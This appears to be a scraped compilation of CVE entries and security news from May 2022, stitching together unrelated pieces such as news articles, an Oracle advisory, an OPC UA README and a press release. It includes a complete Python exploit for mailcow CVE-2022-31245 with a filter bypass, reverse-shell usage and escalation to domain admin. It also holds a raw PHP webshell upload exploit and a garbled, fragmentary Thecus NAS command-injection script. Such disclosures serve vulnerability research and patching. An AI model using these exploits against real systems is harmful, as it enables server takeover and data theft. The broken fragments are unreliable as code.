mailcow before 2022-05d allows a remote authenticated user to inject OS commands and escalate privileges to domain admin via the --debug option in conjunction with the ---PIPEMESS option in Sync Jobs.

**Mailcow CVE-2022-31245**

CVE-2022-31245: RCE and Domain Admin privilege escalation for Mailcow. Including POC.  

Patched Version: https://github.com/mailcow/mailcow-dockerized/releases/tag/2022-05d  
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31245

**CVE-2022-31245: Command Injection, RCE**

Severity: 3/3  
Type: Command Injection, RCE, Domain Takeover  
Affected versions: least 2019 - 2022-05c  

A flaw exists in all recent Mailcow versions where a regular user of the system can exploit the “Sync Job” feature to gain a shell using a command injection in imapsync. Using this vunerability a attacker can then easily pivot to the database and escalate privileges to the role of “Domain Admin” in Mailcow.

This exploit includes persistence by default since Sync Jobs run on a timer.

This exploit compromises the entire Mailcow instance. Tested and working on release as of 2022-05c. Patched in 2022-05d.

**Technical overview**

Using the steps below the vulnerability can be recreated.

Gaining shell:

1.  Go to the Mailcow login page (not SOGo)
2.  Login as a regular user
3.  Go to Sync Jobs
4.  Set the following values: hostname=MAILCOW_IP, Port=IMAP_PORT, Username=CURRENT_USER, Password=CURRENT_PASS, Encryption=PLAIN, Interval=1, Active=Check, Custom Parameters=--debug --nosslcheck --PIPEMESS=CMD Where the field "Custom Parameters" is the important field. CMD can be a arbitrary shell command without spaces. Using uppercase is important!
5.  Press save and wait 1 min for the command to execute.

Custom Parameters example payload:

    --debug --nosslcheck --PIPEMESS=touch${IFS}test.txt
    

CMD cannot contain space,quotes or slashes use ${IFS} instead of space. Uppercase for --PIPEMESS is important to bypass check in functions.mailbox.inc.php at line 340:

if (strpos($custom\_params, 'pipemess')) {
	$custom\_params = '';
}

This uppercase command still works due to the fact that imapsync is case insensitive.

Privilege Escalation:

1.  After gaining shell on the dovcot container run env
2.  Find DBUSER and DBPASS
3.  Login to database using mysql and credentials
4.  Create new admin user or create a new admin API-key

**Proof-of-Concept, POC**

Automated POC. POC could in some cases need modification to run against non-local Mailcow instances.

#!/bin/python3

description \= """
Mailcow authenticated RCE. Only for educational purposes!!
By: ly1g3\[at\]tuta.io
This exploit can be used to get mailcow domain admin using mysql credentials found in "env" after getting shell.
Quotes, spaces and slash cant be used in cmd. Use ${IFS} as space. End command with ; is recommended.
Example reverse shell use: --cmd 'echo${IFS}PYTHON\_REVERSE\_SHELL\_BASE64${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}sh;' where PYTHON\_REVERSE\_SHELL\_BASE64 is python reverse shell.
Example usage: ./mailcow\_poc1.py --url https://192.168.1.2 --user test@local.com --passwd testpass --cmd 'echo${IFS}PYTHON\_REVERSE\_SHELL\_BASE64${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}sh;'
"""

import requests
import urllib
import sys
from urllib.parse import urlparse
import argparse
from argparse import RawTextHelpFormatter
from datetime import datetime

parser \= argparse.ArgumentParser(description\=description, formatter\_class\=RawTextHelpFormatter)
parser.add\_argument('--url', help\='Url to the mailcow server', required\=True)
parser.add\_argument('--user', help\='Mailcow username, example test@mailcow.com', required\=True)
parser.add\_argument('--passwd', help\='Mailcow user password', required\=True)
parser.add\_argument('--cmd', help\='Command to execute', required\=True)

args \= parser.parse\_args()

base\_url \= args.url
\# hostname = urlparse(base\_url).netloc
hostname \= '127.0.0.1'
user \= args.user
password \= args.passwd
cmd \= args.cmd

\# Get the required csrf token
def find\_csrf\_token(text):
    try:
        start1 \= text.index("var csrf\_token")
        start2 \= text.index("'", start1)
        end2 \= text.index("'", start2+1)
        csrf\_token \= text\[start2+1:end2\]
        return csrf\_token
    except:
        return ""

login\_url \= base\_url + '/'

s \= requests.Session()

\# Login
r1 \= s.post(login\_url, data\={'login\_user': user, 'pass\_user': password}, verify\=False)

token \= find\_csrf\_token(r1.text)
if not token:
    print("Error no token found, login problems?")
    sys.exit(0)
print(f"CSRF token: {token}")

sync\_url \= base\_url + '/api/v1/add/syncjob'

\# Create sync job with command injection
attr \= f'{{"host1":"{hostname}","port1":"143","user1":"{user}","password1":"{password}","enc1":"PLAIN","mins\_interval":"1","subfolder2":"","maxage":"0","maxbytespersecond":"0","timeout1":"10","timeout2":"10","exclude":"(?i)spam|(?i)junk","custom\_params":"--debug --nosslcheck --PIPEMESS={cmd}","subscribeall":"1","active":"1","csrf\_token":"{token}"}}'
r2 \= s.post(sync\_url, data\={'attr': attr, 'csrf\_token': token}, verify\=False)

c \= r2.content
if c.find(b"mailbox\_modified") != \-1:
    print("Success, rule modified")
elif c.find(b"object\_exists") != \-1:
    print("ERROR: Object exists, remove existing rule before running this")
    print(c)
    sys.exit(0)
else:
    print("ERROR: Something went wrong")
    print(c)
now \= datetime.now()
current\_time \= now.strftime("%H:%M:%S")
print("Command may take 1min to execute...")
print(f"Done at: {current\_time}")

CVE-2022-31245: GitHub - ly1g3/Mailcow-CVE-2022-31245: CVE-2022-31245: RCE and domain admin privilege escalation for Mailcow

Users urged to update systems amid reports of active exploitation

Users urged to update systems amid reports of active exploitation

A critical vulnerability present among 90,000-plus active installations of the Jupiter WordPress theme allows for the takeover of target websites.

Although attackers must be authenticated to exploit the privilege escalation flaw, which has a CVSS score of 9.9, they only need to do so as a subscriber or customer. For websites that allow users to self-register, this offers little protection against potential attacks.

The bug, along with another, high severity vulnerability and a trio of medium severity flaws, has been patched by the theme’s developer, ArtBees, according to a blog post published on Wednesday (May 18) by Wordfence.

Read more of the latest WordPress security news

In a blog post published on Wednesday, ‘Plugin Vulnerabilities’ claimed to have seen evidence that hackers were already probing for vulnerable installations, and that some websites had likely already been hacked. 

**Bug breakdown**

The privilege escalation bug (CVE-2022-1654), which affects the Jupiter theme and JupiterX Core plugin, resides in the function.

Because vulnerable versions register AJAX actions but fail to perform capability or (cryptographic) nonce checks, “any logged-in user can elevate their privileges to those of an administrator by sending an AJAX request with the action parameter set to ,” explained Wordfence researcher Ram Gall, who uncovered the flaws.

“This calls the function, which calls the resetWordpressDatabase function, where the site is effectively reinstalled with the currently logged-in user as the new site owner”.

Moreover, “the same functionality can also be accessed by sending an AJAX request with the action parameter set to ”.

The high severity issue (CVSS score 8.1), an authenticated path traversal and local file inclusion issue, “could allow an attacker to obtain privileged information, such as nonce values, or perform restricted actions, by including and executing files from any location on the site”.

Tracked as CVE-2022-1657, the vulnerability affects the JupiterX and Jupiter themes.

The medium severity trio includes a pair of insufficient access control issues leading to authenticated arbitrary plugin deactivation, with one also leading to settings modification (CVE-2022-1656) and the other tracked as CVE-2022-1658. The third poses an information disclosure and modification, plus Denial of Service (DoS), issue (CVE-2022-1659).

**Updates**

Wordfence notified ArtBees of all but one of the flaws on April 5, 2022, and partially patched versions were released on April 28.

ArtBees was alerted to the final vulnerability on May 3 and released comprehensively patched versions on May 10.

The issues have been addressed in Jupiter Theme version 6.10.2, JupiterX theme version 2.0.7, and JupiterX Core version 2.0.8.

RECOMMENDED WordPress sites getting hacked ‘within seconds’ of TLS certificates being issued

WordPress theme Jupiter patches critical privilege escalation flaw

Dozens of bugs reported with a backlog containing hundreds more

Dozens of bugs reported with a backlog containing hundreds more

More than 60 instances of a web security flaw in the Swagger-UI library that potentially leads to account takeover have been reported to impacted organizations.

Bug bounty programs operated by PayPal, Shopify, Atlassian, Microsoft, GitLab, and Yahoo were notified, among others.

SmartBear Software’s Swagger-UI is an open source suite of API and development tools for visualizing and interacting with APIs and their resources. The UI is dependency-free, works in all major browsers, and is generated automatically with support for Swagger 2.0 and OAS 3.0.

YOU MIGHT ALSO LIKE Active attacks against VMware flaws prompts emergency update directive

Dawid Moczadło, co-founder of Vidoc Security Lab, published a security advisory on May 16 documenting a DOM cross-site scripting (XSS) vulnerability in the library, which the researcher says has led to a “lot of vulnerable instances”.

**Root cause**

The root cause of the flaw is Swagger-UI’s use of an outdated version of DomPurify, an XML sanitizer library for HTML, MathML, and SVG.

Swagger-UI allows users to provide a URL for an API specification, such as a YAML or JSON file. To view and render them, you add a query parameter. It would be possible to trigger an XSS attack by loading a malicious specification file and accessing the React function at this point, but an attacker would have to bypass the sanitizer.

The researcher was able to visit DOMPurify release pages and search for a suitable bypass. However, the payload he found required tags – and Swagger UI’s functionality expressly forbids their deployment.

“We need a payload that will bypass DomPurify sanitization but can't contain tag,” Moczadło commented. “The easiest way to do that is to find another HTML tag that will act the same as in the bypass.”

Moczadło was able to do this rapidly and create a working exploit.

Catch up with the latest API security news

The researcher told The Daily Swig that the vulnerability allows the execution of JS code in the context of the victim’s browser, and in many cases the team was able to escalate the flaw to account takeover.

Moczadło tested Swagger UI version 3.37.2, using DomPurify version 2.2.2. Versions from 3.14.1 up until 3.38 are impacted by the XSS.

If a vulnerable Swagger UI version is used, the researcher recommends that users update their builds. Version 4.11.1 is the latest release. If the whole package cannot be updated, then updating the DomPurify package alone will suffice.

The security researcher says the vulnerability was fixed at the start of 2021 but it is still widely exploitable.

**Tricky triage**

It is more common for vulnerabilities to be reported quietly before public disclosure, but Moczadło says there are still “another 200 bugs in the backlog to report”.

As a result, the team says it has not generally escalated the vulnerability further, as “we have too many bugs to report and too little time to do it”.

Moczadło added: “Companies responded well, all of them accepted the issue and fixed it sooner or later. The bug was so popular across companies, that we weren’t able to report all of the cases we found \[...\] We only reported the most severe cases where the bug was found on the main domains or subdomains used for authentication.”

GitLab told The Daily Swig that the vulnerability was fixed in GitLab 13.9.2 and the organization recommends that all users upgrade to the latest version as soon as possible.

A Microsoft spokesperson said: “We are aware of this report and are investigating.”

The Daily Swig has also reached out to the researcher and other organizations mentioned in the report. We will update this story if and when we hear back.

RECOMMENDED Revisions to US Computer Fraud and Abuse Act will not prosecute ‘good-faith’ security research

Widespread Swagger-UI library vulnerability leads to DOM XSS attacks

Foxit PDF Editor v11.3.1 was discovered to contain an arbitrary file upload vulnerability.

CVE-2022-28104: Security Bulletins | Foxit Software

Pharmacy Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted image file.

    # Exploit Title: Pharmacy management system - Remote Code Execution (RCE)# Date: 19/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz# Exploit  :  You can upload a php shell file as a productImage# ------------------------------------------------------------------------------------------#                                           POC# ------------------------------------------------------------------------------------------# Request sent as base userPOST /dawapharma/dawapharma/php_action/editProductImage.php?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631Content-Length: 559Connection: closeCookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneelUpgrade-Insecure-Requests: 1-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="old_image"-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="productImage"; filename="shell.php"Content-Type: image/jpeg<?phpif($_REQUEST['s']) {  system($_REQUEST['s']);  } else phpinfo();?></pre></body></html>-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="btn"-----------------------------208935235035266125502673738631--# ResponseHTTP/1.1 302 FoundDate: Tue, 19 Apr 2022 20:43:17 GMTServer: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1X-Powered-By: PHP/8.1.2Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cachelocation: ../product.phpContent-Length: 77Connection: closeContent-Type: text/html; charset=UTF-8Image uploaded successfully{"success":true,"messages":"Successfully Updated"}# ------------------------------------------------------------------------------------------#                                   Request to webshell# ------------------------------------------------------------------------------------------GET /dawapharma/dawapharma/assets/myimages/shell.php?s=echo+0xSaudi HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel# ------------------------------------------------------------------------------------------#                                    Webshell response# ------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Tue, 19 Apr 2022 20:55:58 GMTServer: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1X-Powered-By: PHP/8.1.2Content-Length: 33Connection: closeContent-Type: text/html; charset=UTF-8…0xSaudi</pre></body></html>

CVE-2022-30887: Pharmacy Management System 1.0 Shell Upload ≈ Packet Storm

OPC UA Legacy Java Stack 2022-04-01 allows a remote attacker to cause a server to stop processing messages by sending crafted messages that exhaust available resources.

**OPC Foundation UA JAVA Legacy**

**This repository is provided by OPC Foundation as legacy support for an Java version for OPC UA. It will not receive further features and updates.**

The OPC Foundation will continue maintenance of the .NET Stack which is based on .NET Standard. It can be found here.

The OPC Foundation has formally released the Unified Architecture Java Stack and Sample Code to the community.

Please review official site page (http://opcfoundation.github.io/UA-Java-Legacy/) for:

*   Overview
*   Licensing
*   Sample Applications overview

**Recommended Development Environment**

Note these are recommended, earlier versions might work.

*   Eclipse 4.5.2 (Mars)
*   Maven 3.3.3 (included in Eclipse 4.5.2)
*   JDK 8
*   JDK 6, in case you want to be sure that the built jar is java 6 compatible

The JDK(s) must have the sunjce\_provider, e.g. use Oracle or OpenJDK (because the stack has optional support for the sun jce crypto provider)

**Runtime Dependencies**

The Stack requires Java SE 6 or later to run (for building requirements, see under 'Building the Stack').

See pom.xml for details about dependency jar versions.

The following dependencies are mandatory

*   org.slf4j, SLF4J logging facade

Additionally the following dependencies are optional

*   org.bouncycastle, Bouncy Castle, for using bouncy castle crypto provider (see 'Security' section)
*   com.madgag.spongycastle, Spongy Castle, for using spongycastle crypto provider (used in android, See 'Security' section)
*   org.apache.httpcomponents, HTTPS support libs, for https transport protocol support

Library licenses are in the license-directory. All Apache libraries use the Apache License 2.0. Bouncy Castle and Spongy Castle use the Bouncy Castle License.

**Building the Stack**

As of 1.03 the project is a maven project.

Note that the built jar will be only compatible for the java version it is built with (see the section 'Building Java 6 compatible release' for more information).

**Compiling**

*   Import the project in your favorite IDE
*   e.g. in Eclipse Import->Existing Maven
*   Execute the 'package' phase.

Alternatively assuming you have Maven installed and in PATH, you can build from the command line:

The resulting artifacts are in the 'target' folder

*   opc-ua-stack-XXX.jar, the main jar
*   opc-ua-stack-XXX-javadoc.jar, javadoc documentation
*   opc-ua-stack-XXX-sources.jar, sources
*   opc-ua-stack-XXX-project.zip, zip of this project (without build artifacts)
*   opc-ua-stack-XXX-dependencies.zip, zip of the project dependencies

**Building Java 6 compatible release**

If you want to be sure the built jar is Java 6 compatible, you need to install a Java 6 JDK. In addition, because newest maven versions require at least Java 7, you need to also install it (or later) too.

The reason for requiring a version 6 of the JDK is that, while some newer versions of JDK have support for compiling to older versios of Java it is not enough to just define the source and the target arguments to 1.6. In addition a bootstrapclasspath argument needs to be defined (and pointed to a Java 6 installation) in order to use correct versions of the standard java libraries. Another option is using the older JDK version to compile by using maven-toolchains-plugin, which this project uses. It should also make this more future proof in case future JDK versions drop support for target 1.6, with JDK 9 being the last to support it (see https://bugs.openjdk.java.net/browse/JDK-8028563)

You need to activate profile 'jdk6' to use the toolchains plugin.

Maven needs to know where your JDK 6 installation is. To setup this create a file 'toolchains.xml' in your .m2 folder (which exists in your home folder) with the following contents:

<toolchains\>
  <toolchain\>
	<type\>jdk</type\>
	<provides\>
	  <version\>1.6</version\>
	  <vendor\>sun</vendor\>
	</provides\>
	<configuration\>
	  <jdkHome\>ABSOLUTE PATH TO JAVA 6 JDK HOME</jdkHome\>
	</configuration\>
  </toolchain\>
</toolchains\>

If you have no need to have a Java 6 supported build artifact, then you can run the build with the jdk6 profile disabled.

**Examples**

The 'examples' folder has a separate maven project that contains the samples, it has a dependency to the main stack project. See the examples/README.md for more information.

**Notes for developers**

The stack codegen is provided under the 'codegen' folder. See codegen/README.md for more information

**Package file structure description**

See generated javadoc after building, or package-info.java files in each package

**Mappings between Java and OPC UA types**

See the javadoc for package org.opcfoudnation.ua.builtintypes

**Security**

Security libraries are used as they are available. If no extra libraries are available, the Sun JCE implementation will be used. Testing has so far based on the Bouncy Castle library and it is therefore recommended in normal applications.

The current implementation, since version 1.02.337.0, is based on a flexible CryptoProvider model. There are several implementations of this interface available in the stack and you can also implement your own, if you have a custom security framework that you need to use.

The stack will pick a default CryptoProvider automatically as it finds them from the class path. Alternatively, you can define the provider that you wish to use by setting it with CryptoUtil.setCryptoProvider() or with CryptoUtil.setSecurityPoviderName().

In the same manner, custom certificate framework can be used by implementing interface CertificateProvider and setting it with CertificateUtils.setCertificateProvider().

Current CryptoProvider implementations:

BcCryptoProvider (default, if Bouncy Castle is in the class path: uses Bouncy Castle directly) ScCryptoProvider (default in Android, if Spongy Castle is in the class path) SunJceCryptoProvider (default if Bouncy Castle or Spongy Castle are not available) BcJceCryptoProvider (uses Bouncy Castle via the JCE crypto framework) ScJceCryptoProvider (uses Spongy Castle via the JCE crypto framework)

If any of the ...JceCryptoProvider is used, you will have to install the JCE Unlimited Strength Jurisdiction Policy Files, from Oracle (for Java 6, 7 or 8, respectively), to enable support for 256 bit security policies:

JRE6: http://www.oracle.com/technetwork/java/javase/downloads/jce-6-download-429243.html JRE7: http://www.oracle.com/technetwork/java/javase/downloads/jce-7-download-432124.html JRE8: http://www.oracle.com/technetwork/java/javase/downloads/jce8-download-2133166.html

Android includes a limited version of Bouncy Castle and the standard Bouncy Castle cannot be installed there. It also does not include the Sun classes. However, the Spongy Castle libraries will provide the same functionality as Bouncy Castle in Android, so these libraries should be used in Android, unless the application can do without security altogether.

Current CertificateProvider implementations:

BcCertificateProvider (default, if Bouncy Castle is in the class path) ScCertificateProvider (default in Android, if Spongy Castle is in the class path) SunJceCertificateProvider (default if Bouncy Castle or Spongy Castle are not available)

**Known issues**

*   TLS 1.2 policy required by OPC UA does not work (required ciphers not supported by JSSE)
*   HTTPS testing is not finished yet with the other stacks
*   .NET Client requires that the server has a certificate signed by a trusted CA, if HTTPS is used. See 'examples/README.md'.

CVE-2022-30551: GitHub - OPCFoundation/UA-Java-Legacy: This repository is provided by OPC Foundation as legacy support for an Java version for OPC UA.

Thecus 4800Eco was discovered to contain a command injection vulnerability via the username parameter in /adm/setmain.php.

\# To fix SSL error that occurs when script is started.

\# 1- Open /etc/ssl/openssl.cnf file

\# At the bottom of the file:

\# 2- Set value of MinProtocol as TLSv1.0

def readResult(s, target):

"params": '\[{"start":0,"limit":1,"catagory":"sys","level":"all"}\]'

url \= "https://" + target + "/adm/setmain.php"

resultReq \= s.post(url, data\=d, verify\=False)

dict \= resultReq.text.split()

print("\[+\] Reading system log...\\n")

#Set your command output range

def delUser(s, target, command):

"username": "$("+command+")"

url \= "https://" + target + "/adm/setmain.php?fun=setlocaluser"

delUserReq \= s.post(url, data\=d, allow\_redirects\=False, verify\=False)

if 'Local User remove succeeds' in delUserReq.text:

print('\[+\] %s command was executed successfully' % command)

print('\[-\] %s command was not executed!' %command)

def addUser(s, target, command):

d \= {'batch\_content': '%24('+command+')%2C22222%2C9999'}

url \= "https://" + target + "/adm/setmain.php?fun=setbatch"

addUserReq \= s.post(url, data\=d, allow\_redirects\=False, verify\=False)

if 'Users and groups were created successfully.' in addUserReq.text:

print('\[+\] Users and groups were created successfully')

print('\[-\] Users and groups were not created')

delUser(s, target, command)

def login(target, username, password, command\=None):

urllib3.disable\_warnings(urllib3.exceptions.InsecureRequestWarning)

"option": "com\_extplorer"

url \= "https://" + target + "/adm/login.php"

loginReq \= s.post(url, data\=d, allow\_redirects\=False, verify\=False)

if '"success":true' in loginReq.text:

print('\[+\] Authentication successful')

elif '"success":false' in loginReq.text:

print('\[-\] Authentication failed!')

print('\[-\] Something went wrong!')

addUser(s, target, command)

print("usage: %s targetIp:port username password command" % (args\[0\]))

print("Example 192.168.1.13:80 admin admin id")

login(target\=args\[1\], username\=args\[2\], password\=args\[3\], command\=args\[4\])

if \_\_name\_\_ \== "\_\_main\_\_":

CVE-2021-34111: Thecus N4800Eco Nas Server Control Panel Comand Injection

Vulnerability in Oracle E-Business Suite (component: Manage Proxies). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle E-Business Suite. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. Note: Authentication is required for successful attack, however the user may be self-registered. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

*   Click to view our Accessibility Policy
*   Skip to content

**Description**

This Security Alert addresses vulnerability CVE-2022-21500, which affects some deployments of Oracle E-Business Suite. This vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. If successfully exploited, this vulnerability may result in the exposure of personally identifiable information (PII).

Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.

Oracle SaaS cloud environments are not affected by this vulnerability. This vulnerability could affect the E-Business Suite deployments of Oracle Managed Cloud Services customers. Oracle Managed Cloud Services customers should consult their account team for assistance.

**Affected Products and Patch Information**

Security vulnerabilities addressed by this Security Alert affect the products listed below. The product area is shown in the Patch Availability Document column.

**Please click on the links in the Patch Availability Document column below to access the documentation for patch availability information and installation instructions.**

**Security Alert Supported Products and Versions**

Patches released through the Security Alert program are provided only for product versions that are covered under the Premier Support or Extended Support phases of the Lifetime Support Policy. Oracle recommends that customers plan product upgrades to ensure that patches released through the Security Alert program are available for the versions they are currently running.

Product releases that are not under Premier Support or Extended Support are not tested for the presence of vulnerabilities addressed by this Security Alert. However, it is likely that earlier versions of affected releases are also affected by these vulnerabilities. As a result, Oracle recommends that customers upgrade to supported versions.

Database, Fusion Middleware, Oracle Enterprise Manager products are patched in accordance with the Software Error Correction Support Policy explained in My Oracle Support Note 209768.1. Please review the Technical Support Policies for further guidelines regarding support policies and phases of support.

**References**

*   Oracle Critical Patch Updates, Security Alerts and Bulletins
*   Oracle Critical Patch Updates and Security Alerts - Frequently Asked Questions
*   Risk Matrix Definitions
*   Use of Common Vulnerability Scoring System (CVSS) by Oracle
*   English text version of the risk matrices
*   CVRF XML version of the risk matrices
*   CSAF JSON version of the risk matrices
*   Map of CVE to Advisory/Alert
*   Oracle Lifetime support Policy
*   JEP 290 Reference Blocklist Filter

**Risk Matrix Content**

Risk matrices list only security vulnerabilities that are newly addressed by the patches associated with this advisory. Risk matrices for previous security patches can be found in previous Critical Patch Update advisories and Alerts. An English text version of the risk matrices provided in this document is here.

Security vulnerabilities are scored using CVSS version 3.1 (see Oracle CVSS Scoring for an explanation of how Oracle applies CVSS version 3.1).

Oracle conducts an analysis of each security vulnerability addressed by a Security Alert. Oracle does not disclose detailed information about this security analysis to customers, but the resulting Risk Matrix and associated documentation provide information about the type of vulnerability, the conditions required to exploit it, and the potential impact of a successful exploit. Oracle provides this information, in part, so that customers may conduct their own risk analysis based on the particulars of their product usage. For more information, see Oracle vulnerability disclosure policies.

Oracle lists updates that address vulnerabilities in third-party components that are not exploitable in the context of their inclusion in their respective Oracle product beneath the product's risk matrix.

The protocol in the risk matrix implies that all of its secure variants (if applicable) are affected as well. For example, if HTTP is listed as an affected protocol, it implies that HTTPS (if applicable) is also affected. The secure variant of a protocol is listed in the risk matrix only if it is the _only_ variant affected, e.g. HTTPS will typically be listed for vulnerabilities in SSL and TLS.

**Credit Statement**

The following people or organizations reported security vulnerabilities addressed by this Security Alert to Oracle:

*   Ahmed L Shnawy: CVE-2022-21500
*   Bhat Muneeb: CVE-2022-21500
*   kirti soni: CVE-2022-21500
*   Niteen Kale: CVE-2022-21500
*   Owais Lone: CVE-2022-21500
*   ract hack: CVE-2022-21500
*   SaschA: CVE-2022-21500
*   Vivek Kashyap: CVE-2022-21500

  
**Modification History**

Date

Note

2022-May-19

Rev 1. Initial Release.

**Oracle E-Business Suite Risk Matrix**

This Security Alert contains 1 new security patch for Oracle E-Business Suite.  This vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without requiring user credentials.  The English text form of this Risk Matrix can be found here.

CVE#

Product

Component

Protocol

Remote  
Exploit  
without  
Auth.?

CVSS VERSION 3.1 RISK (see Risk Matrix Definitions)

Supported Versions Affected

Notes

Base  
Score

Attack  
Vector

Attack  
Complex

Privs  
Req'd

User  
Interact

Scope

Confid-  
entiality

Inte-  
grity

Avail-  
ability

CVE-2022-21500

Oracle E-Business Suite

Manage Proxies

HTTP

Yes

7.5

Network

Low

None

None

Un-  
changed

High

None

None

12.1, 12.2

See Note 1

**Notes:**

1.  Authentication is required for successful attack, however the user may be self-registered.

  

Why Oracle

*   Analyst Reports
*   Gartner MQ for Cloud ERP
*   Cloud Economics
*   Corporate Responsibility
*   Diversity and Inclusion
*   Security Practices

Learn

*   What is cloud computing?
*   What is CRM?
*   What is Docker?
*   What is Kubernetes?
*   What is Python?
*   What is SaaS?

What’s New

*   Oracle Supports Ukraine
*   Oracle CloudWorld
*   Oracle and Premier League
*   Oracle Red Bull Racing
*   Employee Experience Platform
*   Oracle Support Rewards

*   © 2022 Oracle
*   Site Map
*   Privacy/Do Not Sell My Info

*   Ad Choices
*   Careers

*   Facebook
*   Twitter
*   LinkedIn
*   YouTube

CVE-2022-21500: Oracle Security Alert Advisory - CVE-2022-21500

New professional certification program establishes a pathway into the workforce for students and career changers by demonstrating their foundational knowledge, skills and abilities to employers.

ALEXANDRIA, Va., May 19, 2022 /PRNewswire/ -- (ISC)² – the world's largest nonprofit association of certified cybersecurity professionals – today announced that more than 1,000 cybersecurity career hopefuls have taken their first step toward a professional certification by completing the (ISC)2 entry-level cybersecurity certification pilot exam since the program launched on Jan. 31.

(ISC)2 created the certification to support and nurture a new generation of cybersecurity professionals entering the field – from recent university graduates to career changers to IT professionals – seeking to validate their security skills. The certification will provide employers with assurance that newcomers have the foundational knowledge, skills and abilities to succeed in entry- and junior-level roles.

"The outstanding response to our pilot program shows the pent-up need for this certification. The (ISC)2 entry-level cybersecurity certification satisfies a void the industry has been struggling to fill for years, and promises to be among the fastest-growing, in-demand cybersecurity certifications," said Clar Rosso, CEO, (ISC)2. "We are facing a global cybersecurity workforce gap of more than 2.7 million people. We can only close that gap if we increase pathways into the field and make a cybersecurity career more accessible to more people. Candidates who pass our exam will show employers that they can contribute to their organizations' missions and have the aptitude to learn and grow on the job."

**How the Exam Works  
**The (ISC)2 entry-level cybersecurity certification pilot exam evaluates candidates across five domains – security principles, business continuity (BC), disaster recovery (DR) and incident response concepts, access controls concepts, network security and security operations. A pilot exam outline is available that contains more details on the content within each domain.

Candidates who pass the (ISC)2 entry-level cybersecurity certification pilot exam become full members of (ISC)2, with access to continuing education, thought leadership, peer support, industry events and other professional development opportunities. Membership supports cybersecurity practitioners in their immediate and future careers as they gain experience and work towards more advanced and specialized certifications, such as the globally renowned (ISC)2 CISSP.

Learn more about the (ISC)2 entry-level cybersecurity certification pilot program, here. There will be no disruption to exam registration and administration throughout the pilot program and any time prior to the launch of the official certification program.

**Exam-Prep Resources Available  
**To prepare for the (ISC)2 entry-level cybersecurity certification pilot exam, candidates can access a series of domain review sessions delivered in online instructor-led or online self-paced formats. All courses review the main themes and areas of expertise covered by the pilot certification exam outline. The courses also include sample questions, helping candidates focus on what to expect during the pilot exam. Candidates will receive a certificate of completion for the review session. Learn more here.

**About (ISC)²**  
(ISC)² is an international nonprofit membership association focused on inspiring a safe and secure cyber world. Best known for the acclaimed Certified Information Systems Security Professional (CISSP®) certification, (ISC)² offers a portfolio of credentials that are part of a holistic, pragmatic approach to security. Our membership, more than 168,000 strong, is made up of certified cyber, information, software and infrastructure security professionals who are making a difference and helping to advance the industry. Our vision is supported by our commitment to educate and reach the general public through our charitable foundation – The enter for Cyber Safety and Education™. For more information on (ISC)², visit www.isc2.org, follow us on Twitter or connect with us on Facebook and LinkedIn.

© 2022 (ISC)² Inc., (ISC)², CISSP, SSCP, CCSP, CAP, CSSLP, HCISPP, CISSP-ISSAP, CISSP-ISSEP, CISSP-ISSMP and CBK are registered marks of (ISC)², Inc.

More Than 1,000 Cybersecurity Career Pursuers Complete the (ISC)² Entry-Level Cybersecurity Certification Pilot Exam

The affected ThroughTek P2P products (SDKs using versions before 3.1.5, any versions with nossl tag, device firmware not using AuthKey for IOTC conneciton, firmware using AVAPI module without enabling DTLS mechanism, and firmware using P2PTunnel or RDT module) do not sufficiently protect data transferred between the local device and ThroughTek servers. This can allow an attacker to access sensitive information, such as camera feeds.

Tag

#ssl